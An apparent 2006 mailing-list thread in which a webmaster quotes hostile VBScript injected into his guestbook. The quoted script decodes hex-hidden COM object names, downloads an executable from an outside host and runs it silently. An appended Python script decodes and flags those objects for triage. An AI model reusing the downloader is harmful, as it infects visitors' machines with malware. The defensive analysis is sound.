You lost me. Are /you/ trying to run this VB script? If not, why do you care about /your/ version of IE? It's the spammer's browser (or spam tool) that matters.
Ok, after a reread, I think I understand better. The spammer posted some code that included an iframe. When you load your guestbook in IE, you get a bunch of virus warnings. Do I have it right?

> -----Original Message-----
> From: Brad Wood [mailto:[EMAIL PROTECTED]
> Sent: Friday, October 27, 2006 1:14 PM
> To: CF-Talk
> Subject: weird VB exploit
>
> Hey guys, I just got some spam posts on my guestbook which include an
> iframe. Inside the iframe a page is called which, after calling about
> 80 unescape JavaScript functions, tries to execute the following VB code.
> I realized it when my antivirus started going nuts telling me about
> executable files it was trying to run.
>
> Do I need a patch for IE? (IE 6.0 on Windows 2000 SP4) I didn't think a
> web page could execute arbitrary files from a web server.
>
> <script language="VBScript">
> On Error Resume Next
> Function h2s(s)
>     Dim i
>     For i = 1 To Len(s) Step 2
>         h2s = h2s & Chr("&" & "H" & Mid(s, i, 2))
>     Next
> End Function
> Const sClassID = "636C7369643A42443936433535362D363541332D313144302D393833412D303043303446433239453336"
> Const sItem_1 = "41646F64622E53747265616D"
> Const sItem_2 = "536372697074696E672E46696C6553797374656D4F626A656374"
> Const sItem_3 = "4D6963726F736F66742E584D4C48545450"
> Const sItem_4 = "5368656C6C2E4170706C69636174696F6E"
> sFileURL = "http://money24online.com/file.exe"
> sFileName = "thw_expl.exe"
> Set DF = Document.createElement("object")
> Call DF.SetAttribute("classid", h2s(sClassID))
> Set AdoSream = DF.CreateObject(h2s(sItem_1), vbNullString)
> Set FS = DF.CreateObject(h2s(sItem_2), vbNullString)
> Set xml_http = DF.CreateObject(h2s(sItem_3), vbNullString)
> Call xml_http.Open("GET", sFileURL, False)
> Call xml_http.Send
> AdoSream.Type = 1
> Set tmp_path = FS.GetSpecialFolder(2)
> sFilePath = FS.BuildPath(tmp_path, sFileName)
> Call AdoSream.Open
> Call AdoSream.Write(xml_http.responseBody)
> Call AdoSream.SaveToFile(sFilePath, 2)
> Call AdoSream.Close
> Set Q = df.CreateObject(h2s(sItem_4), vbNullString)
> Call Q.ShellExecute(sFilePath, vbNullString, vbNullString, "open", 0)
> </script>
>
> ~Brad
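Added example, not part of the original thread: a static triage in Python that decodes the hex string constants the same way the script's h2s() does, without running the script, and flags the COM objects it would create. The watchlist and the function names are assumptions of this example; the constants are copied from the quoted script.

```python
import re

# Assumed watchlist: object names that together indicate a download-and-run dropper.
WATCHLIST = {
    "adodb.stream": "writes binary data to disk",
    "scripting.filesystemobject": "file system access",
    "microsoft.xmlhttp": "HTTP download",
    "shell.application": "process launch (ShellExecute)",
    "clsid:bd96c556-65a3-11d0-983a-00c04fc29e36": "RDS.DataSpace object factory",
}

# Quoted literal made only of hex byte pairs, at least four bytes long.
HEX_LITERAL = re.compile(r'"((?:[0-9A-Fa-f]{2}){4,})"')

def decode_hex_literals(script):
    """Return {hex_literal: decoded_text} for each hex string literal,
    mirroring what the script's own h2s() does at run time."""
    out = {}
    for m in HEX_LITERAL.finditer(script):
        raw = bytes.fromhex(m.group(1))
        # Keep only literals that decode to printable ASCII; others are not names.
        if all(0x20 <= b < 0x7F for b in raw):
            out[m.group(1)] = raw.decode("ascii")
    return out

def triage(script):
    """List (decoded_string, reason) pairs for decoded literals on the watchlist."""
    hits = []
    for decoded in decode_hex_literals(script).values():
        reason = WATCHLIST.get(decoded.lower())
        if reason:
            hits.append((decoded, reason))
    return hits

# Constants copied from the quoted script (class ID rejoined from its wrapped lines).
SAMPLE = '''
Const sClassID = "636C7369643A42443936433535362D363541332D313144302D393833412D303043303446433239453336"
Const sItem_1 = "41646F64622E53747265616D"
Const sItem_2 = "536372697074696E672E46696C6553797374656D4F626A656374"
Const sItem_3 = "4D6963726F736F66742E584D4C48545450"
Const sItem_4 = "5368656C6C2E4170706C69636174696F6E"
sFileName = "thw_expl.exe"
'''

if __name__ == "__main__":
    for decoded, reason in triage(SAMPLE):
        print(f"{decoded:45} {reason}")
```
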

